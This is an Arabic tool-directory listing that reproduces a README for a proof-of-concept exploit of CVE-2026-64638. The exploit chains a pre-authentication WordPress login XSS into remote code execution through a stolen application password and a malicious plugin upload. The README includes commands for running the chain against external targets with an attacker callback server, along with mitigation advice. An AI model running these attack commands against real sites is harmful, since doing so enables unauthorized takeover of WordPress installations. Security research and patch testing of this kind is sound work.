Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-64638-POC — CVE-2026-64638: XSS قبل المصادقة في WordPress → RCE (XSS2Shell) PoC | Kitploit
أدوات/GitHubGitHub/imbas007/cve-2026-64638-poc
ماسحات الثغرات الأمنية للويبتوليد الحمولةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالفريق الأحمر
GitHubimbas007/cve-2026-64638-poc

CVE-2026-64638-POC

CVE-2026-64638: XSS قبل المصادقة في WordPress → RCE (XSS2Shell) PoC

عرض المستودع
11324منذ شهر واحدلم تتم المراجعة بعد
الموقع الإلكتروني

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-64638 — XSS2Shell

XSS انعكاسي قبل المصادقة → تنفيذ أكواد عن بُعد في نواة ووردبريس

License WordPress CVE

⚠️ إخلاء مسؤولية: هذا المستودع مخصص للبحث الأمني المصرح به والأغراض التعليمية فقط. لا تستخدمه ضد أنظمة لا تملكها أو ليس لديك إذن كتابي صريح لاختبارها. الوصول غير المصرح به غير قانوني. راجع SECURITY.md.


نظرة عامة

CVE-2026-64638 هو XSS انعكاسي قبل المصادقة في مسار معالجة تسجيل الدخول/wplogin في نواة ووردبريس. يعود السبب الجذري للخلل إلى تباين في المحلِّل حيث ينجو الإدخال التالف من strip_tags() في PHP لكن يُعاد بناؤه لاحقًا ككود HTML بواسطة wp_kses_post()، مما يسمح لترميز يتحكم به المهاجم بالوصول إلى DOM.

أثبت باحثون في pwn.ai XSS2Shell — وهي سلسلة هجوم ترفع مستوى هذا الـ XSS إلى تنفيذ كامل لأكواد PHP على تثبيت ووردبريس افتراضي عندما يتفاعل مسؤول مُصادَق مع محتوى يتحكم به المهاجم.

الخاصيةالقيمة
CVECVE-2026-64638
CVSS8.9
النوعسلسلة XSS انعكاسي → RCE
المكوّنصفحة تسجيل الدخول في نواة ووردبريس
المتأثرووردبريس < 7.0.3 (تحديثات خلفية حتى 4.7)
المُعالَجووردبريس 7.0.3 (6 أغسطس 2026)
السبب الجذريتباين المحلِّل: strip_tags() مقابل wp_kses_post()

بدء سريع (Docker)

git clone https://github.com/<your>/CVE-2026-64638-POC.git
cd CVE-2026-64638-POC

# One command — spin up vulnerable WordPress 7.0.2 + run full chain
./test.sh up
./test.sh chain

ما يحدث:

[STAGE 1] WordPress 7.0.2 → VULNERABLE
[STAGE 2] XSS payload URL generated
[STAGE 3] Application Password created
[STAGE 4] Plugin uploaded + activated
[STAGE 5] RCE → uid=33(www-data)

جميع الأوامر

./test.sh up         # Start Docker + install WordPress (admin/admin123)
./test.sh scan       # Detect version & patch status
./test.sh chain      # Run full XSS2Shell RCE chain
./test.sh all        # up + scan + chain (all-in-one)
./test.sh down       # Stop containers
./test.sh clean      # Stop + remove all volumes

# Or with Make
make up              # Start Docker
make install         # Install WordPress
make scan            # Check vulnerability
make gen-xss         # Generate XSS payload URL
make test-chain      # Full RCE chain
make serve           # Start callback server on :8080
make down            # Stop containers

بنية المستودع

CVE-2026-64638-POC/
├── README.md
├── SECURITY.md              # Security policy & disclaimer
├── docker-compose.yml        # WordPress 7.0.2 + MySQL 8 + WP-CLI
├── Makefile                  # Shortcut commands
├── test.sh                   # Automated test suite
├── requirements.txt          # Python dependencies
│
├── xss2shell_chain.py       # [MAIN] Full chain: scan → XSS → app-password → plugin → RCE
├── xss2shell_scanner.py     # Version detection + username reflection test
├── xss2shell_checker.py     # Lightweight patch checker (safe, non-exploitative)
├── exploit_server.py        # Callback server for XSS exfiltration
├── xss_payload.html         # Interactive XSS PoC (browser)
│
└── docs/
    ├── CHAIN.md             # Technical breakdown of all 7 chain stages
    ├── MITIGATION.md        # Defensive guidance + detection rules
    └── PAYLOAD_NOTES.md     # Notes on the CVE-specific bypass payload

الاستخدام اليدوي (هدف خارجي)

python3 -m venv .venv && source .venv/bin/activate
pip install -r requirements.txt

# Scan target
python3 xss2shell_chain.py scan -u https://target.example.com

# Generate XSS payload
python3 xss2shell_chain.py gen-xss -u https://target.example.com -c http://your-ip:8080

# Full chain (requires WordPress admin credentials)
python3 xss2shell_chain.py chain \
    -u https://target.example.com \
    --user admin --pass "password" \
    --cmd "id"

# Individual stages
python3 xss2shell_chain.py stage-apppass -u URL --user U --pass P
python3 xss2shell_chain.py stage-plugin -u URL --apppass "PASS"
python3 xss2shell_chain.py stage-rce -u URL --cmd "whoami"

سلسلة هجوم XSS2Shell

راجع docs/CHAIN.md للحصول على التفاصيل الكاملة.

┌─────────────────────────────────────────────────────────────────┐
│  1. Reflected XSS on wp-login.php (failed-login error page)    │
│  2. DOM clobbering to manipulate page context                   │
│  3. JSONP / Same-Origin Method Execution (SOME)                 │
│  4. Application Password creation via REST API                  │
│  5. REST API access with stolen Application Password            │
│  6. Malicious plugin/theme upload                               │
│  7. PHP code execution → full RCE                               │
└─────────────────────────────────────────────────────────────────┘

ملاحظة: تتطلب المراحل من 3 إلى 7 تسجيل دخول مسؤول مُصادَق يتفاعل مع حمولة الـ XSS. الثغرة تحدث قبل المصادقة، لكن سلسلة الـ RCE الكاملة تتطلب وصولاً بمستوى مسؤول لاكتمالها.


التخفيف

  1. حدّث ووردبريس إلى 7.0.3 أو أحدث فورًا
  2. فعِّل التحديثات التلقائية في الخلفية
  3. راجع كلمات مرور التطبيقات (المستخدمون ← الملف الشخصي)
  4. راجع السجلات بحثًا عن أسماء مستخدمين مشبوهة في محاولات تسجيل دخول فاشلة
  5. راقب نشاط رفع الإضافات/السمات

راجع docs/MITIGATION.md للحصول على قواعد تحصين وكشف مفصلة.


المراجع

  • الإصدار الأمني ووردبريس 7.0.3
  • مدونة pwn.ai حول XSS2Shell
  • تحليل pwn.ai لتجاوز SOME/CSP
  • تغطية The Hacker News
  • مقال The CyberSec Guru
  • سجل CVE

المؤلف

بحث أمني وإثبات مفهوم (PoC). للاستخدام التعليمي فقط.

الترخيص

MIT — راجع LICENSE

تنزيل الأداة